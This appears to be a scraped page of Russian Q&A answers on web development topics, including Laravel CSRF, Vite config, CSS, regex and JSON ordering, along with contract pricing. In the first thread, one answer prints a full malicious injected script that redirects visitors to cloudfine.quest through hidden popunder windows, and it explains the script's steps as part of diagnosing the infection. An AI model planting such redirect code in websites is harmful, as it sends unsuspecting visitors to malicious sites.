• Кто-нибудь сталкивался с подключением скрипта с домена cloudfine.quest?

    dima9595
    @dima9595
    Junior PHP
    lolrofl01,
    html разметку или в php файл какой

    Да где угодно. Может вообще в изображение пихнули (хотя я не разбираюсь особо в таком).

    Меня вообще удивляет, что вы как-то ловите такие вирусы. Когда проект самопис, ну или по крайней мере используется что-то популярное (фреймворки или cms), то такого вообще не наблюдается. А вот если брать что-то крякнутое, то вполне может быть.

    В любом случае начните с HTML, потом перейдите к js файлам. Возможно из js как-то вызывается. Потом уже к php.
    И по файлам: нужно смотреть не на наличии подозрительных файлов, а изменении кода. Т.е. могут в зашифрованном виде что-то написано или просто напрямую вызывать то, что не должно быть там.
    Ответ написан
    3 комментария
  • Кто-нибудь сталкивался с подключением скрипта с домена cloudfine.quest?

    Mike_Ro
    @Mike_Ro Куратор тега JavaScript
    Python, JS, WordPress, SEO, Bots, Adversting
    Код скрипта
    document.currentScript.remove();if(typeof wsjwa573==='undefined'){const wsjwa573=true;const wkonuolh='https://cloudfine.quest/redirect';if(('PushManager'in window)&&('Notification'in window)&&('fetch'in window)){window.location.replace('https://'+(window.location.hostname!==undefined?wi...);}else{const is5ykqkx=setInterval(()=>{if(document.readyState==='interactive'||document.readyState==='complete'){clearInterval(is5ykqkx);if('ontouchstart'in window){function vg4ymqkq(afzqftyr){document.removeEventListener('click',vg4ymqkq);if(window.open(afzqftyr.target.href===undefined?window.location.href:afzqftyr.target.href,'_blank')!==null){afzqftyr.preventDefault();afzqftyr.stopPropagation();setTimeout(()=>{window.location.href=wkonuolh;},1000);}}document.addEventListener('click',vg4ymqkq);}else{function vg4ymqkq(afzqftyr){afzqftyr.preventDefault();afzqftyr.stopPropagation();document.removeEventListener('click',vg4ymqkq);const ga3m40pt=window.open('','_blank','fullscreen=no,height=100,left='+(screen.width+100)+',location=no,menubar=no,resizable=no,scrollbars=no,status=no,titlebar=no,toolbar=no,top='+(screen.height+100)+',width=100');if(ga3m40pt!==null){function nxq27s6i(){clearTimeout(ryzfrfy5);ga3m40pt.moveTo(0,0);ga3m40pt.resizeTo(window.screen.availWidth,window.screen.availHeight);ga3m40pt.document.location.href=wkonuolh;window.removeEventListener('focus',nxq27s6i);}const ryzfrfy5=setTimeout(()=>{ga3m40pt.close();window.removeEventListener('focus',nxq27s6i);},8000);ga3m40pt.moveTo(screen.width+100,screen.height+100);window.addEventListener('focus',nxq27s6i);}document.body.style.opacity='1';}document.body.style.opacity='0.7';document.addEventListener('click',vg4ymqkq);}}},50);}}

    Вредонос:
    1. Выполняет все операции и сразу удаляется из dom.
    2. Чекает переменную wsjwa573 (на нее много чего завязано, хз зачем, нет времени вычислять).
    3. Проверяет, если ли в браузере посетителя pushmanager, notification и fetch apis.
    4. Редиректит на вредоносный сайт по условию.
    5. Ставит обработчик ontouchstart по клику и условию.
    Итп.
    Прошерстил все файлы проекта - не нашел никаких подключений. Ни по одному из ключевых слов не находится ничего подобного.

    Разумеется не нашли, вредонос создавался не для того, чтобы его было просто найти. Ищите дальше, кто то его в любом случае подключает на страницу.
    Ответ написан
    6 комментариев
  • Какой фронтенд выбрать в пару к бэку на laravel, чтобы был как SPA, но с SEO индексацией?

    Sanes
    @Sanes
    HTMX, Hotwire Turbo примерно тоже самое.
    Ответ написан
    Комментировать
  • Какой фронтенд выбрать в пару к бэку на laravel, чтобы был как SPA, но с SEO индексацией?

    yesbro
    @yesbro
    Думаю, помогаю думать
    Livewire https://livewire.laravel.com/

    Как у него с SEO?
    Отлично. Как в обычном html

    только ajax запросы по каждому пуку появляются
    При первой загрузке страницы она отдается в чистом html. Аякс запрос будут уже потом идти. Так что поисковик всегда будет получать чистый html.

    На бэке возвращать отрендеренный шаблон и вставлять его на клиентской части вместо текущего.
    Получится тот же самый Livewire, только хуже.
    Ответ написан
    4 комментария
  • Почему vite размещает скрипты на урле 0.0.0.0:5173?

    fox_12
    @fox_12
    Расставляю биты, управляю заряженными частицами
    Что-то типа такого - не работает?
    vite.config.js
    export default defineConfig({
      server: {
        host: '0.0.0.0',
        port: 8000
      },
      ...
    Ответ написан
    1 комментарий
  • Сдвиг страницы при появлении скролла?

    @freedom-twin
    В данном случае как вариант - overflow-y: overlay;
    Ответ написан
    2 комментария
  • Как-то можно убрать csrf в laravel для определенных страниц?

    vfreelancer
    @vfreelancer
    php
    App\Http\Middleware\VerifyCsrfToken
    там добаьте в except

    например, protected $except = [
    'mobile/*',
    'news/articles',
    ];
    Ответ написан
    Комментировать
  • Можно как-то в css убрать определенные стили, если присутствуют другие?

    MrDecoy
    @MrDecoy Куратор тега CSS
    Верставший фронтендер
    /* Правило для li, у которых атрибут style НЕ содержит подстроки list-style-type */
    li:not([style*="list-style-type"]) {
      /* свои стили */
    }
    Ответ написан
    1 комментарий
  • Как парсить сайты с cloudflare на php?

    iMedved2009
    @iMedved2009
    Не люблю людей
    можно. но придется повозиться. cloudflare будет тригерится на любую как ему кажется подозрительную активность, как то серверный ip, частые обращения и так далее. пробуйте через headless браузеры + php-webdriver/php-webdriver или chrome-php/chrome или еще чего то подобное
    Ответ написан
    2 комментария
  • Как исправить ошибку: $(...).owlCarousel is not a function?

    cessel
    @cessel
    Программист, веб-разработчик, предприниатель
    Понимаю что уже не очень актуально, но может кому поможет:
    Один из вариантов решения проблемы: заменить "$" на jQuery перед селектором "#slider" в вашем примере.
    Ответ написан
    2 комментария
  • Как в пхпшторме убрать навязчивые подчеркивания мнимых ошибок?

    delphinpro
    @delphinpro Куратор тега PhpStorm
    frontend developer
    Заменить на $request['content']

    Вообще мне не понятно, для чего сделан объектный доступ к переменным запроса. Возможно это используется внутри, или наследие прошлого. Но использовать его в приложении - так себе идея. Есть методы get(), input(), реализован ArrayAccess.
    Ответ написан
    1 комментарий
  • Должен ли программист выполнять роль девопса на сервере заказчика?

    saboteur_kiev
    @saboteur_kiev Куратор тега Веб-разработка
    software engineer
    С хрена ли это работа девопса? Поднять и запустить проект программист не способен?
    Девопс на отдельную ставку - это оркестрация сотнями и тысячами виртуалок/контейнеров/пайплайнов и так далее.

    А вот то, что это ввязали вам в работу это уже совсем другой вопрос, который должен был уточняться на этапе начала работ, в каком виде вы передаете проект.
    Ответ написан
  • Кто может подсказать по регулярке?

    @AUser0
    Чем больше знаю, тем лучше понимаю, как мало знаю.
    $txt = preg_replace("#<a href=\"([^\"<>]+)\">\1</a>|(https://[^<>]+)#", "<script .... /script>", $txt);
    Ответ написан
    Комментировать
  • Как составить регулярку на поиск исключительно английских слов?

    DevMan
    @DevMan
    для слов достаточно банального [A-Z]+
    для фраз чутка сложнее.
    Ответ написан
    5 комментариев
  • Как грамотно прописать будущие цены по договору с учетом возможного повышения?

    @rPman
    Такова селяви, деньги делают заложником всех их пользователей.
    Государство через подконтрольную ей финансовую систему использует свое население (пользователей ее денег) как буфер для решения периодически возникающих своих проблем.

    Именно поэтому для государства, наличие сторонних свободно конвертируемых валют - как кость в горле, и даже тут - возможность 'свободно' назначать курс (влияние на экономику будет через ту небольшую разницу между назначенным курсом и рыночным) является механизмом влияния.

    А уж как подгорает от криптовалют....

    p.s. по теме вопроса, сейчас наверное уже поздно (хотя, есть еще куда хуже становиться), но существуют биржевые инструменты, позволяющие хеджировать риски, открытием противоположных позиций на рынке с маржинальной позицией.

    т.е. ты к примеру открываешь сделку в рублях, а хотел бы ее ценность закрепить в долларах в пересчете на их стоимость на момент заключения договора, но контрагент этим заниматься не желает/не может, поэтому ты:
    * топаешь на биржу с возможностью открывать маржинальную позицию в рублях (кстати не обязательно)
    * заводишь на ее счет дополнительную сумму (объем - вопрос сложный и спекулятивный)
    * и открываешь позицию на продажу точно такого же количества рублей за баксы, что в сделке
    * держишь эту позицию открытой до завершения сделки
    * и после получения рублей по контракту, закрываешь эту маржинальную позицию.

    Что тут происходит:
    * если курс рубльбакс на момент открытия позиции и закрытия будет одинаковый - ты получишь нужную ценность
    * если бакс подорожает (рубль подешевеет), то маржинальная позиция, закрывшись, принесет тебе большее количество рублей, итоговая сумма денег за контракт и доход с маржинальной позиции по ценности будут сравнимы со стоимостью бакса на момент заключения контракта
    * если бакс подешевеет (рубль подорожает), то маржинальная позиция, закрывшись, принесет тебе убыток в рублях, но если из суммы контракта вычесть эту разницу, их ценность в баксах останется точно такой же

    Таким образом с точки зрения тебя - ты получается заключил сделку в баксах с клиентом, зафиксировав ее стоимость через маржинальную торговлю, но контрагент даже об этом не был в курсе.

    Теперь о подводных камнях:
    * комиссии брокера, за использование брокера (и такие есть, например через доступ к нормальному api), за ввод вывод денег со счета, за открытие и закрытие позиции и главное - за поддержание маржинальной позиции (так как на этот момент берутся заемные средства), обычно эти комиссии на столько неадекватно дороги что имеют смысл только для хеджирования рисков сильных колебаний курса, с другой стороны эти комиссии обычно процент от объема, т.е. могут оказаться незначительными, если сделки маленькие.
    * маржинкол, а точнее правильный выбор суммы, которую заводишь брокеру для обеспечения позиции, должна перекрывать риски возникновения принудительного закрытия маржинальной позиции, т.е. вопрос прогнозирования этого курса, но если сумма залога будет сравнима или даже больше суммы сделки, то вероятность маржинкола очень и очень мала (но не нулевая) плюс момент.. мы же хеджируемся от рисков падения ценности рубля, а маржинкол настанет если рубль внезапно ну очень сильно в ценности вырастет... если бы вероятность такого была высокой, стали бы вы вообще хеджироваться?
    * ситуация в мире такова что биржи и брокеры держат своих клиентов за го...но, по любому поводу, при любых рисках для брокера, все убытки перекладывают на своих клиентов, предлагаю вспомнить как в момент отрицательной стоимости фьючерса на нефть московская биржа останавливала торги, генерируя убытки своим клиентам, которые не могли закрыть свои сделки в нужный момент.
    * курс у брокера, официальный курс центробанка, и главное рыночный курсы - могут отличаться, и по закону подлости будут таковыми как раз в тот самый момент, ради защиты от которого весь сыр бор и затевался
    * риски неполучения рублей по контракту, например договор прервался по вине контрагента или твоей или результат непреодолимой силы, а затраты на поддержание и неудачное завершение маржинальной позиции никуда не делись

    В общем это дело полезное, рабочее но требует тщательной подготовки, подсчетов, выбора правильного надежного брокера и в принципе понимания что ты делаешь и зачем
    Ответ написан
    5 комментариев
  • Как грамотно прописать будущие цены по договору с учетом возможного повышения?

    @Drno
    Цену в долларах на момент оплаты по курсу "продажа" (покупка для вас) у Сбера
    Ответ написан
    4 комментария
  • Как грамотно прописать будущие цены по договору с учетом возможного повышения?

    Adamos
    @Adamos
    Вы учтите, что ваш контрагент тоже не знает, куда рухнет рубль в ближайшее время, и нежданчик в +150% ему может быть просто не по карману, так что от жесткой привязки к баксу, например, он может просто отказаться и пойти искать более сговорчивого исполнителя.
    Туроператоры, например, которые жестко зависят от валют в своей работе, во времена высокой волатильности предусматривали пункты типа "стоимость услуг может быть пересмотрена при росте курса доллара свыше 5% от курса на момент заключения договора".
    Ответ написан
    5 комментариев
  • Есть вариант сохранить в поле json (mysql) массив с нужным порядком?

    @Akina
    Сетевой и системный админ, SQL-программист.
    фишка в том, что в бд порядок меняется, условно скажем, после того, как вытащишь из бд и превратишь обратно в массив, он уже принимает вот такой вид

    Согласно описанию формата, порядок элементов внутри объекта не существует (вернее, не определён), и его поддержание не гарантируется. В отличие от массива.
    Так что если порядок важен, то каждая запись должна быть преобразована в отдельный объект, а все они - сложены в массив в нужном порядке, т.е. JSON должен выглядеть, например, так:
    '[{"a":1}, {"b":2}, {"c":3}]'

    Я его превращаю в json (json_encode), и кладу в бд.

    Покажите точно, как выглядит этот JSON.
    Покажите точный CREATE TABLE таблицы, в которую кладёте.
    Покажите, как точно выглядит в таблице положенное туда JSON значение.
    Покажите точно это же JSON значение после обратного извлечения.

    Да, всё это - для одного и того же JSON.
    Ответ написан
    Комментировать